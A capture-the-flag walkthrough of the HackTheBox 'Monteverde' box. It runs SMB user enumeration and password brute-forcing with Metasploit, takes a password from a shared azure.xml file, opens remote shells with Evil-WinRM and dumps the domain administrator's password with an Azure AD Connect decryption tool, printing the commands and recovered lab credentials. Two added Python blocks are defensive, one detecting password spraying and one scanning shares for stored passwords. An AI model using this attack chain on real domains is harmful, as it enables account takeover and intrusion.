HTB Monteverde Walkthrough

A technical walk through of hacking the Monteverde box on HackTheBox!

Hello and welcome to another of my HackTheBox walkthroughs. Today we are going to hack the Monteverde box on HTB!

Let's jump right in and start with the classical nmap command!

nmap -p 1-65535 -T4 -A -v 10.10.10.172


...and take a look at the interesting result:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-20 18:56:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49788/tcp open  msrpc         Microsoft Windows RPC


Mmm, many ports here. That could be a good thing, but also a tricky scenario: too many ports means a lot of time spent identifying vulnerabilities. But it is too early to talk about that. Good, it's a Microsoft Windows machine, so now we can enumerate it and start collecting some interesting information.

enum4linux 10.10.10.172


As usual, I report only the interesting aspects of the results.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 20 20:01:26 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
[...]
 ============================= 
|    Users on 10.10.10.172    |
 ============================= 
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2	Name: AAD_987d7f2f57d2	Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos	Name: Dimitris Galanos	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope	Name: Mike Hope	Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary	Name: Ray O'Leary	Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs	Name: SABatchJobs	Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan	Name: Sally Morgan	Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata	Name: svc-ata	Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec	Name: svc-bexec	Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp	Name: svc-netapp	Desc: (null)

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
[...]
[GROUPS info]
[...]
[+] Getting domain group memberships:
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'DnsUpdateProxy' (RID: 1102) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan


Well, there's a huge amount of information and many users to try, so let's prepare a list of users for brute-forcing over the SMB protocol. This is my list, from the outcome of the enumeration:

administrator
guest
krbtgt
domain admins
root
bin
none
AAD_987d7f2f57d2
dgalanos
mhope
roleary
SABatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp


If you read my articles (really? there's someone that reads them?) you will know that I usually use the scanner/smb/smb_login module in Metasploit to try to identify some nice credentials. I would like to draw attention to the options I chose for this specific scenario: I set blank_passwords to true, to also try an empty password for each user in the list, and user_as_pass to true, to try the username as the password for each user.

msf5 > use auxiliary/scanner/smb/smb_login 
msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/smb/smb_login) > set detect_any_domain true
detect_any_domain => true
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.172
rhosts => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set user_file user-list.txt
user_file => user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /opt/Teeth/static/wp-password-list.txt
pass_file => /opt/Teeth/static/wp-password-list.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.172:445      - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\administrator:administrator',
[...]
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\administrator:changeme',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:guest',
[*] 10.10.10.172:445      - 10.10.10.172:445 - Correct credentials, but unable to login: '.\guest:',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:admin',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:password1',
[...]
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\roleary:site',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\roleary:changeme',
[+] 10.10.10.172:445      - 10.10.10.172:445 - Success: '.\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445      - 10.10.10.172:445 - Domain is ignored for user SABatchJobs
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\smorgan:smorgan',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\smorgan:',
[...]


As you can see from the output, it was exactly the second option that identified a valid user. What I want to say is: don't skip something simple to save time; sometimes it could be the key to the secret door.
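From the defender's side, the run above is one source address failing against many different accounts within seconds, with one success in the middle. The following is an added example, not part of the original walkthrough, that flags this pattern in a simplified export of Windows Security events (4625 failed logon, 4624 successful logon); the CSV layout, addresses, timestamps and thresholds are constructed assumptions.

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED, SUCCESS = "4625", "4624"  # Windows Security event IDs

# Constructed sample (time, event id, target account, source address).
# The first source walks a user list; the second is one user mistyping.
SAMPLE_EVENTS = """\
2020-02-20T19:10:01,4625,administrator,10.10.14.7
2020-02-20T19:10:02,4625,guest,10.10.14.7
2020-02-20T19:10:03,4625,krbtgt,10.10.14.7
2020-02-20T19:10:04,4625,mhope,10.10.14.7
2020-02-20T19:10:05,4625,roleary,10.10.14.7
2020-02-20T19:10:06,4624,SABatchJobs,10.10.14.7
2020-02-20T19:10:07,4625,smorgan,10.10.14.7
2020-02-20T19:10:08,4625,svc-ata,10.10.14.7
2020-02-20T19:12:00,4625,dgalanos,10.10.20.31
2020-02-20T19:12:30,4625,dgalanos,10.10.20.31
2020-02-20T19:13:10,4624,dgalanos,10.10.20.31
"""


def parse_events(text):
    """Parse the CSV export into time-ordered (when, event_id, user, source)."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 4:
            continue  # skip malformed lines instead of failing the whole run
        when, event_id, user, source = (field.strip() for field in row)
        events.append((datetime.fromisoformat(when), event_id, user.lower(), source))
    return sorted(events)


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag sources that fail against >= min_users distinct accounts in window."""
    by_source = defaultdict(list)
    for event in events:
        by_source[event[3]].append(event)

    findings = []
    for source, rows in by_source.items():
        recent = deque()  # failed logons still inside the sliding window
        targeted, start, end = set(), None, None
        for when, event_id, user, _ in rows:
            if event_id != FAILED:
                continue
            recent.append((when, user))
            while when - recent[0][0] > window:
                recent.popleft()
            users_in_window = {name for _, name in recent}
            if len(users_in_window) >= min_users:
                targeted |= users_in_window
                start = start or recent[0][0]
                end = when
        if not targeted:
            continue
        # A success from the same source during the spray is the urgent part:
        # that account's password was guessed.
        succeeded = sorted({user for when, event_id, user, _ in rows
                            if event_id == SUCCESS and start <= when <= end + window})
        findings.append({"source": source, "targeted": sorted(targeted),
                         "first_seen": start, "last_seen": end,
                         "succeeded": succeeded})
    return findings


if __name__ == "__main__":
    for finding in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(finding["source"], "failed against", len(finding["targeted"]),
              "accounts; succeeded as:", finding["succeeded"] or "none")
```

Any account listed under "succeeded" should have its password reset and its recent activity reviewed.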

Good, we have a credential now. Let's see what we can do with it through the Samba client.

in7rud3r@kali:~$ smbclient -U MEGABANK\\SABatchJobs -L 10.10.10.172
Enter MEGABANK\SABatchJobs's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        azure_uploads   Disk      
        C$              Disk      Default share
        E$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        users$          Disk      
SMB1 disabled -- no workgroup available


Ok, something interesting here. I hope we have access to at least one of these shares.

I navigated for hours looking for something interesting, and I found it in the end...

in7rud3r@kali:~$ smbclient -U MEGABANK\\SABatchJobs //10.10.10.172/users$
Enter MEGABANK\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                              D        0  Fri Jan  3 14:12:48 2020
  ..                             D        0  Fri Jan  3 14:12:48 2020
  dgalanos                       D        0  Fri Jan  3 14:12:30 2020
  mhope                          D        0  Fri Jan  3 14:41:18 2020
  roleary                        D        0  Fri Jan  3 14:10:30 2020
  smorgan                        D        0  Fri Jan  3 14:10:24 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos\
smb: \dgalanos\> ls
  .                              D        0  Fri Jan  3 14:12:30 2020
  ..                             D        0  Fri Jan  3 14:12:30 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> cd mhope\
smb: \mhope\> ls
  .                              D        0  Fri Jan  3 14:41:18 2020
  ..                             D        0  Fri Jan  3 14:41:18 2020
  azure.xml                     AR     1212  Fri Jan  3 14:40:23 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml 
getting file \mhope\azure.xml of size 1212 as azure.xml (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \mhope\> cd ..
smb: \> cd roleary\
smb: \roleary\> ls
  .                              D        0  Fri Jan  3 14:10:30 2020
  ..                             D        0  Fri Jan  3 14:10:30 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \roleary\> cd ..
smb: \> cd smorgan\
smb: \smorgan\> ls
  .                              D        0  Fri Jan  3 14:10:24 2020
  ..                             D        0  Fri Jan  3 14:10:24 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \smorgan\> cd ..
smb: \> exit

As you can see, I downloaded an XML file about Azure, and when I checked what was inside, I found this:

Great, we could have another password, probably for the mhope user, but, as said before, don't leave anything to chance. So, back to our brute-forcing: this time try only this single password against the whole user list created before. It will be fast this time, and you will be sure that this password works for only one of them. The output confirms what I already knew.

[*] Auxiliary module running as background job 1.
[*] 10.10.10.172:445      - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\administrator:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\krbtgt:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\domain admins:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\root:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\bin:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\none:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\AAD_987d7f2f57d2:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\dgalanos:4n0therD4y@n0th3r$',
[+] 10.10.10.172:445      - 10.10.10.172:445 - Success: '.\mhope:4n0therD4y@n0th3r$'
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\roleary:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\SABatchJobs:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\smorgan:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\svc-ata:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\svc-bexec:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\svc-netapp:4n0therD4y@n0th3r$',
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
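The root cause of this step is a file holding a reusable password inside a user folder that another account could read over the share. The following is an added example, not part of the original walkthrough, of an audit that walks a share's directory tree and reports XML files with password-like fields while masking the values; the folder names, file contents and the field-name pattern are constructed assumptions, since the page does not show the content of azure.xml.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Field names treated as secrets (assumed pattern, tune for your environment).
SECRET_NAME = re.compile(r"passw(or)?d|pwd|secret", re.IGNORECASE)


def local_name(tag):
    """Strip an XML namespace: '{ns}Password' -> 'Password'."""
    return tag.rsplit("}", 1)[-1]


def find_secrets(xml_path):
    """Return (field name, masked value) pairs for secret-looking elements."""
    try:
        # For files from untrusted sources, prefer the third-party defusedxml
        # parser, which blocks entity-expansion attacks.
        root = ET.parse(xml_path).getroot()
    except (ET.ParseError, OSError):
        return []
    hits = []
    for element in root.iter():
        value = (element.text or "").strip()
        if not value:
            continue
        # Check the tag itself (<Password>) and attribute values such as
        # <S N="Password">, the shape used by PowerShell object exports.
        labels = [local_name(element.tag)] + list(element.attrib.values())
        label = next((name for name in labels if SECRET_NAME.search(name)), None)
        if label:
            hits.append((label, value[0] + "*" * (len(value) - 1)))
    return hits


def scan_tree(top):
    """Map each XML file under top (relative path) to its masked findings."""
    report = {}
    for folder, _dirs, files in os.walk(top):
        for name in files:
            if name.lower().endswith(".xml"):
                path = os.path.join(folder, name)
                hits = find_secrets(path)
                if hits:
                    report[os.path.relpath(path, top)] = hits
    return report


def build_demo_share(top):
    """Write constructed sample files that mimic per-user folders on a share."""
    samples = {
        ("demo_user", "azure.xml"):
            '<Objs Version="1.1.0.1" '
            'xmlns="http://schemas.microsoft.com/powershell/2004/04">'
            '<Obj RefId="0"><Props>'
            '<S N="Password">Constructed-Example-1</S>'
            '</Props></Obj></Objs>',
        ("other_user", "settings.xml"): "<settings><theme>dark</theme></settings>",
    }
    for (folder, name), body in samples.items():
        os.makedirs(os.path.join(top, folder), exist_ok=True)
        with open(os.path.join(top, folder, name), "w", encoding="utf-8") as handle:
            handle.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as top:
        build_demo_share(top)
        for path, hits in scan_tree(top).items():
            print(path, hits)
```

Run it against a mounted copy of each user share and pair the findings with a review of who can read those folders.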

We are close to finding the first flag. As in some other articles I wrote, the best remote shell for Windows is "Evil-WinRM" and, as I said in a previous article, I prefer the docker version of this specific... "tool" :P

I don't keep the docker service running, so as not to load my little machine. If you are in the same situation, remember to start the docker service before launching the specific docker instance: service docker start. And now...

in7rud3r@kali:/root/Desktop/hackthebox/_Monteverde - 10.10.10.172/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.172 -u MEGABANK\\mhope -p '4n0therD4y@n0th3r$' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 user.txt


*Evil-WinRM* PS C:\Users\mhope\Desktop> more user.txt
4******************************2

...we capture the first flag.

Gooooooood. Ok, let's go to the root.

First of all, I'd like to understand what I can do with this user, and the whoami command can help me.

*Evil-WinRM* PS C:\program Files\Microsoft Azure AD Sync\Bin> whoami -all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.


Ok, it seems that this user is an Azure Admin and that they have some interesting privileges; in particular, "Add workstations to domain" means that we have access to the Active Directory, probably as administrator, and we know that the Active Directory also holds user information. I don't have a lot of experience with the Azure system (I worked on Azure in the past, but I configured services on the cloud), so I chose to do a quick search on Google. My search was "exploit AD via azure" and I was very happy when I saw that the first result was right for me. I link the page here so you can read and study this exploit: https://vbscrub.video.blog/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

Ok, fantastic, if it works we complete this machine, let's go! Go back to the open shell and proceed. In the article you can read that you need only two files, which you can download directly from the page, so download them and extract them into the folder that we configured to exchange data with the docker container, in my case /home/foo/data/ (which maps to the /data folder in the docker container). I extracted them into the /home/foo/data/to-upload/ folder. You have to read the whole article carefully, because at one step the author says that:

This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e cd “C:\Program Files\Microsoft Azure AD Sync\Bin”), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll from the download link is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error.

So I decided to upload them into the Documents folder of the mhope user and proceed.

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /data/to-upload/AdDecrypt.exe

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/to-upload/AdDecrypt.exe to C:\Users\mhope\Documents\AdDecrypt.exe

Data: 19796 bytes of 19796 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /data/to-upload/mcrypt.dll   

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/to-upload/mcrypt.dll to C:\Users\mhope\Documents\mcrypt.dll

Data: 445664 bytes of 445664 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> dir


    Directory: C:\Users\mhope\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/1/2020   6:51 AM          14848 AdDecrypt.exe
-a----         3/1/2020   6:51 AM         334248 mcrypt.dll


Great, we only have to cross our fingers and hope that it all works correctly. I move to the Bin folder mentioned and try to launch it.

*Evil-WinRM* PS C:\program Files\Microsoft Azure AD Sync\Bin> \users\mhope\documents\AdDecrypt.exe

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Error reading from database: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)
Closing database connection...


Ok, there's something wrong. I repeat... read the whole article... so now I know that:

AdDecrypt.exe (with no parameters)

Will attempt to access the ADSync database on the default SQLExpress “LocalDb” instance

AdDecrypt.exe -FullSQL

Will attempt to access the ADSync database on a full fat MS SQL instance using windows authentication (the actual connection string used is: “Server=LocalHost;Database=ADSync;Trusted_Connection=True;” )

I know, this clue comes immediately before the previous part of the article... I keep telling you to read... I'm incorrigible :D

Ok, try again and...

*Evil-WinRM* PS C:\program Files\Microsoft Azure AD Sync\Bin> \users\mhope\documents\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

...bingooooooo!

Well, really simple now, stop your docker container, modify the credentials and start again.

in7rud3r@kali:/root/Desktop/hackthebox/_Monteverde - 10.10.10.172/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.172 -u MEGABANK\\administrator -p 'd0m@in4dminyeah!' -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir


    Directory: C:\Users\Administrator\Documents


Mode                LastWriteTime Length Name
----                ------------- ------ ----
d-----         1/2/2020   3:06 PM        SQL Server Management Studio
d-----         1/2/2020   3:10 PM        Visual Studio 2017
d-----         1/3/2020   5:28 AM        WindowsPowerShell


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
1******************************c


Thanks for reading and happy hacking!

The awesome image used in this article is called Puking Warlock and was created by Fabricio Rosa Marques.